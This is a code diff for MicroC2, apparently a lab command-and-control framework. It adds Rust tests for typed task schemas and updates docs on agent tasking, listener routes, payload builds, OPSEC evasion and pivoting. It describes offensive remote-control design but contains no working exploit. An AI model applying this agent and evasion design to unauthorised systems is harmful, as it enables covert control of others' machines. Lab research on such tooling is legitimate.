+        excessive_timeout.timeout_seconds = MAX_TASK_TIMEOUT_SECONDS + 1;
+        assert!(excessive_timeout.validate_for_agent("agent-one").is_err());
+    }
+
+    #[test]
+    fn result_and_status_update_round_trip() {
+        let task = sample_task();
+        let update = TaskStatusUpdate::running(&task, "2026-07-23T16:00:03Z".to_string());
+        update.validate().expect("valid status update");
+        let encoded_update = serde_json::to_string(&update).expect("serialize update");
+        assert!(encoded_update.contains("\"status\":\"running\""));
+        assert_eq!(
+            serde_json::from_str::<TaskStatusUpdate>(&encoded_update).expect("deserialize update"),
+            update
+        );
+
+        let result = TaskResult {
+            schema_version: TASK_SCHEMA_VERSION,
+            task_id: task.id,
+            agent_id: task.agent_id,
+            outcome: TaskOutcome::Completed,
+            started_at: "2026-07-23T16:00:03Z".to_string(),
+            completed_at: "2026-07-23T16:00:04Z".to_string(),
+            exit_code: Some(0),
+            output: TaskOutput {
+                stdout: "hello\n".to_string(),
+                stderr: String::new(),
+            },
+            error: None,
+        };
+        result.validate().expect("valid result");
+        let encoded_result = serde_json::to_string(&result).expect("serialize result");
+        assert!(encoded_result.contains("\"outcome\":\"completed\""));
+        assert_eq!(
+            serde_json::from_str::<TaskResult>(&encoded_result).expect("deserialize result"),
+            result
+        );
+
+        let invalid_result = TaskResult {
+            started_at: "2026-07-23T16:00:04Z".to_string(),
+            completed_at: "2026-07-23T16:00:03Z".to_string(),
+            ..result
+        };
+        assert!(invalid_result.validate().is_err());
+    }
+
+    #[test]
+    fn result_and_status_update_reject_zero_timestamps() {
+        let task = sample_task();
+        let update = TaskStatusUpdate::running(&task, "0001-01-01T00:00:00Z".to_string());
+        assert!(update.validate().is_err());
+
+        let result = TaskResult {
+            schema_version: TASK_SCHEMA_VERSION,
+            task_id: task.id,
+            agent_id: task.agent_id,
+            outcome: TaskOutcome::Completed,
+            started_at: "0001-01-01T00:00:00Z".to_string(),
+            completed_at: "2026-07-23T16:00:04Z".to_string(),
+            exit_code: Some(0),
+            output: TaskOutput {
+                stdout: String::new(),
+                stderr: String::new(),
+            },
+            error: None,
+        };
+        assert!(result.validate().is_err());
+    }
+
+    #[test]
+    fn result_validation_enforces_caps_and_outcome_coherence() {
+        let valid = TaskResult {
+            schema_version: TASK_SCHEMA_VERSION,
+            task_id: "task-one".to_string(),
+            agent_id: "agent-one".to_string(),
+            outcome: TaskOutcome::Completed,
+            started_at: "2026-07-23T16:00:03Z".to_string(),
+            completed_at: "2026-07-23T16:00:04Z".to_string(),
+            exit_code: Some(0),
+            output: TaskOutput {
+                stdout: String::new(),
+                stderr: String::new(),
+            },
+            error: None,
+        };
+        valid.validate().expect("coherent completed result");
+
+        let mut oversized_stdout = valid.clone();
+        oversized_stdout.output.stdout = "x".repeat(MAX_TASK_OUTPUT_CHARS + 1);
+        assert!(oversized_stdout.validate().is_err());
+
+        let mut oversized_error = valid.clone();
+        oversized_error.outcome = TaskOutcome::Failed;
+        oversized_error.error = Some("x".repeat(MAX_TASK_ERROR_CHARS + 1));
+        assert!(oversized_error.validate().is_err());
+
+        let mut completed_with_error = valid.clone();
+        completed_with_error.error = Some("unexpected".to_string());
+        assert!(completed_with_error.validate().is_err());
+
+        let mut completed_without_zero = valid.clone();
+        completed_without_zero.exit_code = Some(1);
+        assert!(completed_without_zero.validate().is_err());
+
+        let mut failed_without_error = valid;
+        failed_without_error.outcome = TaskOutcome::Failed;
+        failed_without_error.exit_code = Some(1);
+        assert!(failed_without_error.validate().is_err());
+    }
+
+    #[test]
+    fn task_parser_rejects_unknown_fields_for_schema_v1() {
+        let mut encoded = serde_json::to_value(sample_task()).expect("serialize task");
+        encoded["future_metadata"] = json!({"key": "value"});
+
+        let err = serde_json::from_value::<Task>(encoded).expect_err("strict v1 task");
+        assert!(err.to_string().contains("unknown field"));
+
+        let mut nested = serde_json::to_value(sample_task()).expect("serialize task");
+        nested["arguments"]["future_argument"] = json!(true);
+        let err = serde_json::from_value::<Task>(nested).expect_err("strict v1 arguments");
+        assert!(err.to_string().contains("unknown field"));
+
+        let mut result =
+            serde_json::from_str::<serde_json::Value>(GOLDEN_RESULT).expect("parse result");
+        result["future_result_field"] = json!(true);
+        let err = serde_json::from_value::<TaskResult>(result).expect_err("strict v1 task result");
+        assert!(err.to_string().contains("unknown field"));
+
+        let mut update = serde_json::from_str::<serde_json::Value>(GOLDEN_STATUS_UPDATE)
+            .expect("parse status update");
+        update["future_status_field"] = json!(true);
+        let err = serde_json::from_value::<TaskStatusUpdate>(update)
+            .expect_err("strict v1 task status update");
+        assert!(err.to_string().contains("unknown field"));
+    }
+
+    #[test]
+    fn identifier_policy_is_ascii_and_bounded() {
+        for value in ["agent-one", "agent_1", "agent.1", "agent:1", "A9"] {
+            validate_identifier("agent_id", value).expect("contract-valid identifier");
+        }
+        let too_long = "a".repeat(129);
+        for value in ["", "agent one", "agent/one", "agént", too_long.as_str()] {
+            assert!(
+                validate_identifier("agent_id", value).is_err(),
+                "unexpected valid identifier {value:?}"
+            );
+        }
+    }
+
+    #[test]
+    fn task_validation_enforces_shell_command_size() {
+        let mut task = sample_task();
+        task.arguments.command = "x".repeat(MAX_SHELL_COMMAND_CHARS);
+        task.validate_for_agent("agent-one")
+            .expect("command at character cap");
+
+        task.arguments.command = "é".repeat(MAX_SHELL_COMMAND_CHARS + 1);
+        assert!(task.validate_for_agent("agent-one").is_err());
+    }
+}

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -17,22 +17,22 @@ Operator browser
   |  HTTPS + WebSocket
   v
 Go server / operator API
-  |  creates listeners, queues commands, stores files and payload builds
+  |  creates listeners, queues typed tasks, stores files and payload builds
   v
 HTTP(S) listener instances
   |  polling endpoints
   v
 Rust agents
-  |  heartbeat, command poll, result submission
+  |  heartbeat, task poll, status update, result submission
   v
 In-memory task/result state on the server
 ```
 
 The server process now keeps an explicit operator mux for the browser UI,
 operator APIs, and WebSockets. Agent polling routes stay on listener-owned muxes
-bound to listener ports. This does not add authentication yet, but it makes route
-ownership explicit so operator-only controls and agent-facing endpoints can be
-hardened independently.
+bound to listener ports. Operator routes use a loopback-or-shared-token guard
+and explicit browser-origin checks. This is a safe lab baseline rather than a
+multi-user authorization system.
 
 ## Repository Layout
 
@@ -77,7 +77,7 @@ are visible during development.
 | Operator UI | operator web/API port | `/`, `/home/`, `/static/` |
 | Operator API | operator web/API port | `/api/agents/*`, `/api/listeners/*`, `/api/payload/*`, `/api/file_drop/*`, `/api/socks5/*` |
 | Operator WebSockets | operator web/API port | `/ws/logs`, `/ws/terminal` |
-| Agent listener API | listener ports | `/api/agent/{agent_id}/heartbeat`, `/command`, `/result`, `/tasks`, `/results` |
+| Agent listener API | listener ports | `/api/agent/{agent_id}/heartbeat`, `/tasks`, `/tasks/{task_id}/status`, `/results`, plus deprecated `/command` and `/result` adapters |
 
 ### Operator Routes
 
@@ -91,9 +91,12 @@ are visible during development.
 | `/api/listeners/{id}/start` | `internal/handlers/api` | Start a stopped listener. |
 | `/api/listeners/{id}/stop` | `internal/handlers/api` | Stop a running listener. |
 | `/api/agents/list` | `internal/handlers/api` | Aggregate agents across listeners. |
-| `/api/agents/command` | `internal/handlers/api` | Queue a raw command string for an agent using a JSON `agent_id`. |
-| `/api/agents/{id}/command` | `internal/handlers/api` | Queue a raw command string for an agent. |
-| `/api/agents/{id}/results` | `internal/handlers/api` | Fetch stored command results. |
+| `/api/agents/{id}/tasks` | `internal/handlers/api` | `POST` a typed task or `GET` a bounded, paginated page of newest-first task summaries. |
+| `/api/agents/{id}/tasks/{task_id}` | `internal/handlers/api` | Get one full Task v1 resource, including terminal stdout/stderr. |
+| `/api/agents/{id}/tasks/{task_id}/cancel` | `internal/handlers/api` | Cancel a queued task before it is dispatched. |
+| `/api/agents/command` | `internal/handlers/api` | Deprecated adapter from an `agent_id` plus raw command to a v1 shell task. |
+| `/api/agents/{id}/command` | `internal/handlers/api` | Deprecated adapter from a raw command to a v1 shell task. |
+| `/api/agents/{id}/results` | `internal/handlers/api` | Deprecated bare-array result adapter with strict `limit`/`offset` pagination and a 16 MiB encoded-page ceiling; response headers expose count, total, and continuation offset. |
 | `/api/file_drop/upload` | `internal/handlers/api` | Upload operator files into the server file store. |
 | `/api/file_drop/list` | `internal/handlers/api` | List operator file-drop contents. |
 | `/api/file_drop/download/{name}` | `internal/handlers/api` | Download a file-drop item. |
@@ -103,10 +106,53 @@ are visible during development.
 | `/ws/logs` | `internal/handlers/ws` | Stream recent and live server logs. |
 | `/ws/terminal` | `internal/handlers/ws` | Browser-accessible shell on the server host. |
 
-The operator APIs and WebSockets currently lack a complete authentication,
-authorization, origin, and CSRF boundary. The server terminal can execute shell
-commands on the host running MicroC2 and should be treated as a local lab-only
-tool until #78 is complete.
+The operator guard allows loopback clients or a configured shared token and
+checks browser origins for HTTP and WebSocket routes. It is not actor-aware
+authentication or authorization. The server terminal can execute shell commands
+on the host running MicroC2 and remains a local, controlled-lab capability.
+
+### Typed Task Contract
+
+The v1 wire formats are defined by:
+
+- [Create Task Request v1](schemas/task-create-request-v1.schema.json)
+- [Task v1](schemas/task-v1.schema.json)
+- [Task summary v1](schemas/task-summary-v1.schema.json)
+- [Task page v1](schemas/task-page-v1.schema.json)
+- [Task status update v1](schemas/task-status-update-v1.schema.json)
+- [Task result v1](schemas/task-result-v1.schema.json)
+- [Task result summary v1](schemas/task-result-summary-v1.schema.json)
+
+The operator creation body contains `schema_version`, `type`, typed
+`arguments`, `timeout_seconds`, and `expires_in_seconds`. A successful
+`POST /api/agents/{agent_id}/tasks` returns `202 Accepted` with the complete
+Task v1 resource. The server owns task IDs, agent correlation, lifecycle status,
+and queue timestamps. The agent owns the correlated terminal Task Result v1,
+including outcome, execution timestamps, exit code, and separate stdout/stderr.
+
+`GET /api/agents/{agent_id}/tasks` returns Task Page v1 with explicit `limit`,
+`offset`, `total`, and `next_offset` fields. Pages contain at most 100
+newest-first Task Summary v1 resources. A summary keeps lifecycle and terminal
+metadata but never includes stdout or stderr; clients retrieve those bounded
+streams from `GET /api/agents/{agent_id}/tasks/{task_id}` on demand. This keeps
+periodic dashboard polling independent of retained output volume.
+
+Typed result submissions have a 32 MiB transport-body cap. That covers compact
+JSON encodings of both schema-maximum result streams, including clients that
+escape astral code points as surrogate pairs; optional JSON whitespace still
+counts toward the transport cap.
+
+Task status moves through `queued`, `dispatched`, `running`, and a terminal
+`completed`, `failed`, `cancelled`, or `expired` state. `expires_at` is the
+latest server-authorized start time, so both queued and dispatched tasks expire
+before execution. A short internal delivery lease allows the same task ID to be
+redelivered if a poll response is lost; exact running acknowledgements and
+terminal results are idempotent. The agent retains unacknowledged work and
+completed results in a bounded in-memory outbox so transport retries do not
+repeat shell side effects.
+
+Legacy operator `/command` routes are deprecated compatibility adapters; new
+callers must use the typed `/tasks` resource.
 
 ### Agent Listener Routes
 
@@ -117,12 +163,21 @@ bound host and port.
 | Route | Method | Purpose |
 | --- | --- | --- |
 | `/api/agent/{agent_id}/heartbeat` | `POST` | Agent reports ID, OS, host, IPs, and last-seen data. |
-| `/api/agent/{agent_id}/command` | `GET` | Agent polls for the next queued raw command string. |
-| `/api/agent/{agent_id}/result` | `POST` | Agent submits one command result. |
-| `/api/agent/{agent_id}/tasks` | `GET` | Placeholder currently returning an empty task list. |
-| `/api/agent/{agent_id}/results` | `POST` | Alias path handled as result submission in the current dispatcher. |
+| `/api/agent/{agent_id}/tasks` | `GET` | Dispatch the next Task v1 resource, or return `204 No Content`. |
+| `/api/agent/{agent_id}/tasks/{task_id}/status` | `POST` | Accept a Task Status Update v1; the initial contract supports `running`. |
+| `/api/agent/{agent_id}/results` | `POST` | Accept a terminal Task Result v1 correlated by task and agent ID. |
+| `/api/agent/{agent_id}/command` | `GET` | Deprecated raw-command poll adapter; it dispatches only tasks created through legacy operator routes. |
+| `/api/agent/{agent_id}/result` | `POST` | Deprecated raw-result adapter into the typed lifecycle store. |
 
-The active protocol stores agents, command queues, and result history in memory.
+Runtime agent IDs currently provide correlation, not authentication. Until
+authenticated enrollment tracked by #104 lands, listener ports must be exposed
+only inside an isolated, authorized lab; an untrusted client that learns an
+agent ID could otherwise poll its task or forge a status/result. Verified TLS
+protects transport confidentiality but does not by itself bind a request to an
+enrolled runtime identity.
+
+The active protocol stores agents, task queues, lifecycle state, and results in
+memory.
 Server restart loses this state. Durable storage is a Phase 1 roadmap item.
 
 ### Listener Lifecycle
@@ -144,9 +199,11 @@ script. It requires a selected listener, derives the connection URL from that
 listener, writes an agent `config.json`, invokes `agent/build.sh`, and tracks the
 generated payload in memory for download.
 
-Current limitation: the payload ID is the listener ID. That couples listener,
-payload build, and runtime agent identity. Issue #64 tracks separating listener
-ID, payload/build ID, and runtime agent ID.
+Listener, payload/build, and runtime agent IDs are distinct. A selected listener
+provides connection configuration, each build receives its own payload ID, and
+each execution enrolls with a runtime agent ID. Build provenance is present but
+still partial; issue #99 tracks supported-profile validation, canonical output
+paths, and the complete inspectable manifest.
 
 ### Storage
 
@@ -156,7 +213,7 @@ Current storage is intentionally simple:
 - Operator uploads: configured server upload directory, default `uploads`.
 - Payload artifacts: `static/payloads/{debug,release}/{payload_id}`.
 - Server logs: `server.log`, streamed to `/ws/logs`.
-- Agent registry, command queues, results, and generated payload registry:
+- Agent registry, task queues, lifecycle state, results, and generated payload registry:
   in-memory Go maps.
 
 There is no database or migration layer yet.
@@ -176,13 +233,16 @@ At runtime the agent:
 3. Starts SOCKS5/pivot background tasks when configured.
 4. Enters an OPSEC assessment loop.
 5. Sends heartbeat data when allowed.
-6. Polls for one command at a time.
-7. Executes shell commands with a timeout.
-8. Obfuscates command output with the agent ID as key material.
-9. Submits results back to the HTTP polling listener.
+6. Polls for one typed task at a time.
+7. Retains the task until an exact running acknowledgement is accepted.
+8. Dispatches by task type and executes shell tasks with their configured
+   process-group/job-object timeout and bounded output capture.
+9. Retains and retries the exact correlated result until the listener accepts
+   it, without executing the task again.
 
-The agent uses raw command strings as the active task format. A typed task/result
-model is planned but not implemented yet.
+Shell Task v1 is the active end-to-end format. File transfer, pivot control, and
+future modules must add explicit task types and schemas rather than parse
+operator-provided raw command strings.
 
 ### OPSEC Engine
 
@@ -204,26 +264,28 @@ currently implement window title checks.
 ### File Transfer And Pivot Modules
 
 File upload/download helpers exist under `agent/src/file_handling/`, and
-SOCKS5/pivot types exist under `agent/src/networking/`. The active command loop
-does not yet expose a complete operator command grammar for file transfer or
-pivot start/stop. `pivot_start` and `pivot_stop` helper functions exist but are
-not wired into the active dispatch path. Issue #88 tracks completing that
-integration, and #71 tracks SOCKS5/pivot maturity.
+SOCKS5/pivot types exist under `agent/src/networking/`. The active task loop
+does not yet expose typed file transfer or pivot operations. `pivot_start` and
+`pivot_stop` helper functions exist but are not wired into the typed dispatch
+path. Issue #88 tracks extending the v1 foundation after #98, and #71 tracks
+SOCKS5/pivot maturity.
 
 ## Static UI
 
 The UI is static HTML/CSS/JavaScript served by the Go server. Current pages
 cover:
 
-- Dashboard and agent command submission.
+- Dashboard and typed shell task submission/paginated history.
 - Listener creation and lifecycle actions.
 - Payload generation and download.
 - File drop upload, list, download, and delete.
 - Server terminal.
 
-The UI talks directly to the REST and WebSocket routes listed above. It does not
-currently have a separate frontend build system. A few UI paths are ahead of the
-backend:
+The UI submits shell tasks through the operator `/tasks` endpoint, polls bounded
+summary pages, and loads stdout/stderr from an individual task only on operator
+request. Agent, listener, command, result, and error values are inserted with
+DOM `textContent`, not interpreted as HTML. It does not currently have a
+separate frontend build system. A few UI paths are ahead of the backend:
 
 - agent removal calls `DELETE /api/agents/{id}`, which has no real handler yet;
 - listener and file-drop JavaScript reference EventSource streams that are not
@@ -231,12 +293,13 @@ backend:
 
 ## Current Prototype Gaps
 
-The main gaps are tracked as issues:
+The main remaining gaps are tracked as issues:
 
-- #75: separate operator UI/API/WebSocket routes from agent-facing endpoints.
-- #78: add lab-safety hardening for auth, origins, TLS defaults, and file paths.
-- #64: separate listener, payload/build, and runtime agent identities.
-- #88: wire file transfer and pivot controls into active command dispatch.
+- #98: complete and stabilize the typed task/result transition.
+- #97: persist agents, task lifecycles, results, payloads, and listener events.
+- #100: add structured, durable audit events.
+- #88: add file transfer and pivot controls as typed task families after #98.
+- #99: finish payload validation and manifests; current provenance is partial.
 - #65: finish the agent configuration system and optional OPSEC feature gating.
 
 Until those are complete, MicroC2 should be treated as a controlled lab research

--- a/docs/design.md
+++ b/docs/design.md
@@ -29,23 +29,76 @@ MicroC2 has three primary roles:
 | Role | Responsibility |
 | --- | --- |
 | Operator UI | Browser interface for listeners, agents, payload generation, files, logs, and terminal access. |
-| Server | Coordination point for operator APIs, listeners, payload builds, file storage, command queues, and results. |
-| Agent | Rust runtime that reports status, polls for commands, executes allowed work, and submits results under OPSEC control. |
+| Server | Coordination point for operator APIs, listeners, payload builds, file storage, task queues, and results. |
+| Agent | Rust runtime that reports status, polls for tasks, executes allowed work, and submits results under OPSEC control. |
 
-The current command path is intentionally simple:
+The primary command path now uses a versioned typed contract:
 
-1. The operator selects an agent in the UI and submits a raw command string.
-2. The server finds the listener that knows that agent ID.
-3. The command is appended to an in-memory queue for that agent.
-4. The agent polls `/api/agent/{agent_id}/command`.
-5. The agent executes or queues the command depending on OPSEC mode.
-6. The agent posts the result to `/api/agent/{agent_id}/result`.
-7. The UI reads result history through `/api/agents/{agent_id}/results`.
+1. The operator selects an agent and creates a shell task with
+   `POST /api/agents/{agent_id}/tasks`.
+2. The server validates the request, assigns the task ID and v1 envelope, and
+   queues it with an expiry and execution timeout.
+3. The agent polls `GET /api/agent/{agent_id}/tasks`; the server dispatches the
+   next task or returns `204 No Content`.
+4. The agent acknowledges execution through
+   `POST /api/agent/{agent_id}/tasks/{task_id}/status`.
+5. The agent submits a correlated terminal result to
+   `POST /api/agent/{agent_id}/results`.
+6. The UI reads a bounded page of lifecycle summaries through
+   `GET /api/agents/{agent_id}/tasks?limit=50&offset=0` and retrieves a full
+   Task v1 resource, including output, only when the operator opens
+   `GET /api/agents/{agent_id}/tasks/{task_id}`.
 
-This proves the end-to-end thesis workflow, but it is not the final tasking
-model. The next design step is typed tasks and typed results, so shell, file
-transfer, pivot control, heartbeat, and future module tasks can share schemas,
-status transitions, timeouts, and audit metadata.
+Shell is the first task type. File transfer, pivot control, and future modules
+should extend this envelope with explicit argument and result schemas rather
+than add new string grammars.
+
+### Typed Task Contract v1
+
+The normative contracts are:
+
+- [Create Task Request v1](schemas/task-create-request-v1.schema.json)
+- [Task v1](schemas/task-v1.schema.json)
+- [Task summary v1](schemas/task-summary-v1.schema.json)
+- [Task page v1](schemas/task-page-v1.schema.json)
+- [Task status update v1](schemas/task-status-update-v1.schema.json)
+- [Task result v1](schemas/task-result-v1.schema.json)
+- [Task result summary v1](schemas/task-result-summary-v1.schema.json)
+
+An operator creates a shell task with:
+
+```json
+{
+  "schema_version": 1,
+  "type": "shell",
+  "arguments": {
+    "command": "whoami"
+  },
+  "timeout_seconds": 30,
+  "expires_in_seconds": 300
+}
+```
+
+The server responds with `202 Accepted` and the complete Task v1 resource,
+including `schema_version`, `id`, `agent_id`, status, and server timestamps.
+The terminal Task Result v1 is nested under `result` when present and separates
+`stdout` from `stderr`. Operator list responses are newest-first Task Page v1
+resources with a maximum of 100 Task Summary v1 items. Summaries retain result
+metadata but omit the potentially large output streams; the individual task
+resource is the canonical output retrieval path.
+
+The lifecycle is `queued → dispatched → running → completed|failed`. A queued
+task may instead become `cancelled`; a queued or dispatched task becomes
+`expired` when it has not started by `expires_at`. Delivery uses an internal
+lease: a lost poll response causes the same task ID to be offered again, while
+exact repeated acknowledgements and results are accepted idempotently. Task
+lifecycle timestamps use server receipt time; the nested result preserves the
+agent's execution timestamps without making clock synchronization a transition
+precondition.
+
+`POST /api/agents/command` and `POST /api/agents/{agent_id}/command` remain
+temporary compatibility adapters. They translate legacy raw commands into v1
+shell tasks and are deprecated: new UI and API clients must use `/tasks`.
 
 ## Server Design
 
@@ -65,13 +118,15 @@ Current strengths:
 
 Current constraints:
 
-- Operator and agent routes still share one server process and route namespace.
-- Agent registry, command queues, result history, and generated payload registry
+- Agent registry, task queues, result history, and generated payload registry
   are in memory.
-- Operator APIs and WebSockets do not yet have complete auth/origin safety.
-- File handling still needs stricter basename and path validation.
-- The server terminal is powerful and should remain local-lab only until safety
-  controls exist.
+- Operator access uses a lab-oriented shared-token or loopback guard, not
+  production multi-user authentication and authorization.
+- Agent listener requests are correlated by runtime ID but are not yet bound to
+  an authenticated enrollment session (#104).
+- Structured audit events and durable task/result history are not implemented.
+- The server terminal remains a powerful lab-only capability even with the
+  operator guard and origin checks.
 
 The server now keeps the route surfaces explicit so they can be hardened
 independently:
@@ -98,19 +153,24 @@ The active implementation supports:
 - Fallback config loading from `.config/config.json`.
 - Direct or SOCKS5-proxied HTTP client creation.
 - Heartbeats with host, OS, local IP, and egress metadata.
-- Raw shell command polling and result submission.
-- Basic command timeout handling.
-- Result obfuscation before submission.
+- Versioned shell task polling, running acknowledgement, and correlated result
+  submission.
+- Lease-safe task redelivery and an in-memory delivery outbox that retries exact
+  acknowledgements/results without re-executing completed work.
+- Server-defined task expiry and agent-enforced command timeout handling.
+- Process-group (Unix) or job-object (Windows) timeouts and bounded
+  stdout/stderr capture.
+- Explicit UTF-8 stdout/stderr in typed results; XOR output remains limited to
+  deprecated legacy result compatibility.
 - Adaptive OPSEC scoring and mode transitions.
 - In-memory encryption helper for OPSEC state.
 
 Partially wired or prototype areas:
 
 - File upload/download helpers exist but are not reachable through a stable
-  operator command grammar yet.
+  typed task yet.
 - Pivot frame/server code exists, but command dispatch does not fully expose
   pivot start/stop.
-- Payload, listener, and runtime agent identity are currently coupled.
 - OPSEC is runtime-configurable in several places, but not fully feature-gated.
 - Cross-platform behavior is uneven: Windows has richer user/window checks,
   while non-Windows checks are simpler.
@@ -148,15 +208,7 @@ Payload generation is listener-driven today. The operator selects a listener,
 the server derives the agent connection settings, writes a config file, invokes
 the Rust build script, and stores the artifact for download.
 
-The current design is convenient for a prototype but has one important flaw:
-the listener ID is reused as the payload ID and agent ID. That makes it hard to
-reason about one listener serving many payload builds or many runtime agents.
-Several payload UI options are also aspirational today: indirect syscalls, custom
-sleep techniques, DLL sideloading metadata, shellcode output, and an OPSEC
-checkbox are passed through parts of the UI/config/build path but are not a
-complete implemented payload feature set.
-
-The intended identity split is:
+Listener, payload/build, and runtime agent identities are now distinct:
 
 | Identity | Meaning |
 | --- | --- |
@@ -164,8 +216,12 @@ The intended identity split is:
 | Payload/build ID | Reproducible build artifact and embedded config. |
 | Agent runtime ID | One live or historical runtime agent instance. |
 
-Issue #64 should establish that split before larger workflow features depend on
-agent identity.
+Several payload UI options remain aspirational: indirect syscalls, custom sleep
+techniques, DLL sideloading metadata, shellcode output, and an OPSEC checkbox
+are passed through parts of the UI/config/build path but are not a complete
+implemented payload feature set. Issue #99 is therefore only partially complete:
+seed provenance exists, while supported-profile validation, canonical outputs,
+and a complete inspectable build manifest remain.
 
 ## Transport Design
 
@@ -196,23 +252,23 @@ The desired boundary is:
 
 ## Safety Design
 
-The current project must be operated as a lab-only prototype. Safe defaults are
-not complete yet. Near-term safety work should focus on the operator surface,
-because it contains listener management, payload generation, file operations,
-log access, and a server terminal.
+The project must still be operated as a lab-only prototype. The Phase 0 safety
+baseline now guards operator routes with loopback-or-token access, restricts
+operator WebSocket origins, makes listener CORS explicit, keeps insecure agent
+TLS opt-in, and validates file-store basenames. The remaining design direction
+is:
 
-Design direction:
-
-- Bind operator UI/API to localhost by default where practical.
-- Add authentication before remote operator access.
-- Restrict WebSocket origins.
-- Make CORS origins explicit instead of wildcarded.
-- Keep insecure TLS behavior opt-in and visible.
-- Validate file names as basenames and avoid path traversal through joins.
+- Evolve the shared-token guard into actor-aware authentication and roles before
+  multi-user operation.
+- Bind every agent task/status/result request to an authenticated enrollment
+  credential or enforced mTLS identity (#104).
 - Add audit events for listener, payload, file, terminal, and agent tasking.
+- Add target scoping and explicit confirmation metadata for risky future task
+  types.
 - Add clear docs for isolated lab deployment.
 
-This safety work is tracked primarily by #75 and #78.
+The Phase 0 route split and lab-safety work are complete in #75 and #78;
+structured governance continues in #100.
 
 ## Documentation And Testing Expectations
 
@@ -228,13 +284,17 @@ paths.
 
 ## Near-Term Design Priorities
 
-1. Finish this documentation pass (#87).
-2. Split operator and agent-facing route surfaces (#75).
-3. Add lab-safety hardening for auth, origins, file paths, and safe defaults
-   (#78).
-4. Fix listener/payload/runtime identity separation (#64).
-5. Define typed tasks and wire file transfer/pivot commands through that model
-   (#88).
+1. Finish the retry-safe typed shell task/result path and retire primary UI use
+   of raw command adapters (#98).
+2. Bind agent-facing lifecycle requests to authenticated enrollment sessions
+   before any promotion beyond an isolated lab (#104).
+3. Persist agents, task state, results, payload metadata, and listener events
+   across restart (#97).
+4. Add causal structured audit events on top of the durable model (#100).
+5. Extend the typed task registry with file transfer and pivot operations after
+   the v1 shell contract is stable (#88).
+6. Complete payload profile validation and full build manifests; current #99
+   provenance is partial P1 work.
 
-Those steps create the foundation for richer transports, durable evidence,
-automation APIs, and reporting without compounding prototype debt.
+The data path is #98 → #97 → #100; #104 is a parallel P0 security gate before
+promotion beyond the isolated-lab boundary.

--- a/docs/development-workflow.md
+++ b/docs/development-workflow.md
@@ -92,11 +92,41 @@ For route-boundary changes, also use this smoke path in a controlled local lab:
    `https://localhost:8443/api/agent/test/heartbeat` returns `404`.
 3. Create or start an HTTP listener on a separate port.
 4. POST a heartbeat to the listener at `/api/agent/test/heartbeat`.
-5. Queue a command through the operator API at `/api/agents/command` with
-   `agent_id` in the JSON body.
-6. Poll the command from the listener at `/api/agent/test/command`.
-7. POST a result to the listener at `/api/agent/test/result`.
-8. Read results through the operator API at `/api/agents/test/results`.
+5. Create a shell task through `POST /api/agents/test/tasks` with typed
+   `schema_version: 1`, `arguments`, `timeout_seconds`, and
+   `expires_in_seconds`; record the returned task ID and confirm the response is
+   `202 Accepted`.
+6. Poll the task from the listener at `/api/agent/test/tasks` and confirm the
+   returned Task v1 resource becomes `dispatched`.
+7. POST a `running` Task Status Update v1 to
+   `/api/agent/test/tasks/{task_id}/status`.
+8. POST the terminal Task Result v1 to `/api/agent/test/results`.
+9. Read the correlated lifecycle metadata through the bounded
+   `GET /api/agents/test/tasks?limit=50&offset=0` Task Page v1 response, then
+   read the nested stdout/stderr from
+   `GET /api/agents/test/tasks/{task_id}`.
+
+For delivery-failure coverage, also confirm that a task poll whose response is
+lost redelivers the same ID only after its lease, that a dispatched task cannot
+start at or after `expires_at`, and that exact repeated running/result payloads
+return success without executing shell work twice. Keep a completed result in
+the agent outbox until the server acknowledges it.
+
+Agent IDs are not credentials in the current listener protocol. Run this smoke
+path only on an isolated authorized network until #104 binds the lifecycle
+routes to authenticated enrollment sessions.
+
+The normative fixtures for this smoke path are
+[`task-create-request-v1.schema.json`](schemas/task-create-request-v1.schema.json),
+[`task-v1.schema.json`](schemas/task-v1.schema.json),
+[`task-summary-v1.schema.json`](schemas/task-summary-v1.schema.json),
+[`task-page-v1.schema.json`](schemas/task-page-v1.schema.json),
+[`task-status-update-v1.schema.json`](schemas/task-status-update-v1.schema.json),
+[`task-result-v1.schema.json`](schemas/task-result-v1.schema.json), and
+[`task-result-summary-v1.schema.json`](schemas/task-result-summary-v1.schema.json).
+Legacy
+operator `/command` routes are compatibility adapters only and should not be
+used for new smoke tests.
 
 ```sh
 cd agent

--- a/docs/roadmap.md
+++ b/docs/roadmap.md
@@ -107,9 +107,9 @@ Candidate issues:
 - #86 `[Server] Fix listener lifecycle and remove placeholder protocol code` (complete)
 - #85 `[CI] Add baseline Go/Rust build and test checks` (complete)
 - #89 `[CI] Make format and Foxguard baseline checks blocking` (complete)
-- #87 `[Docs] Populate architecture, design, and roadmap docs from thesis/current code`
-- #75 `[Server] Separate UI and agent API endpoints`
-- #78 `[Security] Fix lab-safety and hardening bugs`
+- #87 `[Docs] Populate architecture, design, and roadmap docs from thesis/current code` (complete)
+- #75 `[Server] Separate UI and agent API endpoints` (complete)
+- #78 `[Security] Fix lab-safety and hardening bugs` (complete)
 
 ## Phase 1: Make Operations Coherent
 
@@ -139,9 +139,19 @@ Exit criteria:
 
 Candidate issues:
 
-- #88 `[Agent] Wire file transfer and pivot controls into command dispatch`
+- #98 `[Server/Agent] Replace raw string command dispatch with typed task and
+  result schemas` — shell task contract v1, bounded summary pages, and
+  on-demand full results are the Phase 1 foundation.
+- #104 `[Security] Bind agent tasking to authenticated enrollment sessions` —
+  P0 gate before task listeners are exposed beyond an isolated lab.
+- #97 `[Server] Add durable storage for agents, tasks, results, payloads, and
+  listener events`
+- #100 `[Server] Add structured audit events for operator actions and agent
+  tasking`
+- #88 `[Agent] Wire file transfer and pivot controls into command dispatch` —
+  extend the typed contract only after #98.
 - #65 `[Agent] Configuration System extension`
-- #64 `[ID Parsing and Agent Generation]`
+- #64 `[ID Parsing and Agent Generation]` (complete)
 
 ## Phase 2: Transport And Pivot Maturity
 
@@ -193,6 +203,9 @@ Exit criteria:
 
 Candidate issues:
 
+- #99 `[Payload] Validate build options and record build provenance` — partial,
+  P1. Seed provenance landed, but the supported build matrix, fail-fast option
+  validation, canonical artifact path, and complete inspectable manifest remain.
 - #79 `[Agent] Reduce dependencies as much as possible`
 - #67 `[Agent] - Source-Level Mutation Engine (Phase 1)` — v0 landed: seeded
   mutation (`MUTATION_SEED`) covering the config XOR key, a junk-code module,
@@ -357,12 +370,17 @@ detection, Internet-scale botnet market measurement.
 
 Recommended next sequence:
 
-1. Finish #87 docs so the current architecture and constraints are explicit.
-2. Start #75 to split operator and agent-facing route surfaces.
-3. Tackle #78 lab-safety hardening on top of the clearer route boundary.
